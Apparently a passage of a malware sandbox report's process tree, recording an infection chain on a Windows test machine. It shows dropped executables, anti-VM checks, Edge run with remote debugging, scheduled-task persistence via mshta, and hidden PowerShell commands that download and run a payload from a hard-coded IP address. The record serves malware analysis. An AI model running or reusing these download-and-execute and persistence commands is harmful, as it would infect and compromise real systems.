                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:2
                                                                                                                                            7⤵
                                                                                                                                              PID:5364
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
                                                                                                                                              7⤵
                                                                                                                                                PID:5212
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8
                                                                                                                                                7⤵
                                                                                                                                                  PID:5164
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2296 /prefetch:2
                                                                                                                                                  7⤵
                                                                                                                                                    PID:7812
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
                                                                                                                                                    7⤵
                                                                                                                                                    • Uses browser remote debugging
                                                                                                                                                    PID:7824
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
                                                                                                                                                    7⤵
                                                                                                                                                    • Uses browser remote debugging
                                                                                                                                                    PID:5344
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2284 /prefetch:2
                                                                                                                                                    7⤵
                                                                                                                                                      PID:2016
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2680 /prefetch:2
                                                                                                                                                      7⤵
                                                                                                                                                        PID:2688
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3928 /prefetch:2
                                                                                                                                                        7⤵
                                                                                                                                                          PID:5956
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2472 /prefetch:2
                                                                                                                                                          7⤵
                                                                                                                                                            PID:8136
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3904 /prefetch:2
                                                                                                                                                            7⤵
                                                                                                                                                              PID:6196
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2324 /prefetch:2
                                                                                                                                                              7⤵
                                                                                                                                                                PID:1036
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,14602777774069033975,11191948110462843276,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3128 /prefetch:2
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:1232
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10078030101\7UlMpzX.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10078030101\7UlMpzX.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                                                                            PID:2096
                                                                                                                                                            • C:\Users\Admin\AppData\Local\.WindowTasks\bw6Zk6HcGidGsMw2iM.exe
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                                              PID:3616
                                                                                                                                                              • C:\Users\Admin\AppData\Local\VirtualStore\VirtDrKC88JMOd.iso
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                PID:4552
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\ShellKernelBridge.exe
                                                                                                                                                                  "C:/Users/Admin/AppData/Local/Microsoft/ShellKernelBridge.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Modifies system certificate store
                                                                                                                                                                  PID:1048
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Oracle\VirtualBoxNetworkBridge.exe
                                                                                                                                                                  "C:/Users/Admin/AppData/Roaming/Oracle/VirtualBoxNetworkBridge.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:3808
                                                                                                                                                                • C:\Users\Admin\AppData\Local\DriverStore\winDriverChipsetService.exe
                                                                                                                                                                  "C:/Users/Admin/AppData/Local/DriverStore/winDriverChipsetService.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:1964
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\NhNotifSys\YrOIYblUI.bin
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\NhNotifSys\YrOIYblUI.bin"
                                                                                                                                                                    8⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4928
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:224
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:3764
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10086770101\31d8c9df94.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10086770101\31d8c9df94.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:3452
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn eWf1qmasD4N /tr "mshta C:\Users\Admin\AppData\Local\Temp\J6jJgRTPq.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                              5⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3972
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /create /tn eWf1qmasD4N /tr "mshta C:\Users\Admin\AppData\Local\Temp\J6jJgRTPq.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                6⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:768
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              mshta C:\Users\Admin\AppData\Local\Temp\J6jJgRTPq.hta
                                                                                                                                                              5⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:4276
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ULRCRBCGGABMWBPA01VWSIIWX2RGR7CG.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                6⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:4704
                                                                                                                                                                • C:\Users\Admin\AppData\Local\TempULRCRBCGGABMWBPA01VWSIIWX2RGR7CG.EXE
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\TempULRCRBCGGABMWBPA01VWSIIWX2RGR7CG.EXE"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5260
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10086780121\am_no.cmd" "
                                                                                                                                                            4⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:2848
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /t 2
                                                                                                                                                              5⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:5032
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                              5⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5252
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                                                                                                                                6⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5296
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                              5⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5548
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                                                                                                                                                                6⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5560
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                              5⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:5688
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                                                                                                                                                                6⤵
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:5700
                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                              schtasks /create /tn "DePtGmaumMQ" /tr "mshta \"C:\Temp\mWClfSMdE.hta\"" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                              5⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:5972
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              mshta "C:\Temp\mWClfSMdE.hta"
                                                                                                                                                              5⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:4648
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                6⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:3520
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                                                                                                                                                                  7⤵
                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:5564
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10086880101\e5327898ee.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10086880101\e5327898ee.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:2932
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10086890101\BXxKvLN.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10086890101\BXxKvLN.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2540
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10086900101\mAtJWNv.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10086900101\mAtJWNv.exe"
                                                                                                                                                            4⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:2604
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10086900101\mAtJWNv.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10086900101\mAtJWNv.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5940
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10086900101\mAtJWNv.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10086900101\mAtJWNv.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:5900
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10086900101\mAtJWNv.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10086900101\mAtJWNv.exe"
                                                                                                                                                              5⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:316
                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2604 -s 980
                                                                                                                                                              5⤵
                                                                                                                                                              • Program crash
                                                                                                                                                              PID:2696
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10086910101\FvbuInU.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10086910101\FvbuInU.exe"
                                                                                                                                                            4⤵
                                                                                                                                                              PID:3032
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10086920101\v6Oqdnc.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10086920101\v6Oqdnc.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:5740
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10086930101\3Mv6i65.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10086930101\3Mv6i65.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:6796
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10086930101\3Mv6i65.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10086930101\3Mv6i65.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:7260
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10086940101\khykuQw.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10086940101\khykuQw.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:7488
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10086950101\JCFx2xj.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10086950101\JCFx2xj.exe"
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:7628
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2X0520.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\2X0520.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                    • Downloads MZ/PE file
                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Identifies Wine through registry keys
                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                    PID:3444
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\GJ21TKI3PC16YY0DFMWL0KE.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\GJ21TKI3PC16YY0DFMWL0KE.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Identifies Wine through registry keys
                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                      PID:2436
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4976 -ip 4976
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2976
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:5060
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    PID:3360
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\d0HNrLB.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\d0HNrLB.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:4272
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\d0HNrLB.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4592
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\d0HNrLB.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                      PID:2376
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4272 -s 808
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Program crash
                                                                                                                                                                      PID:3316
                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:3452
                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4272 -ip 4272
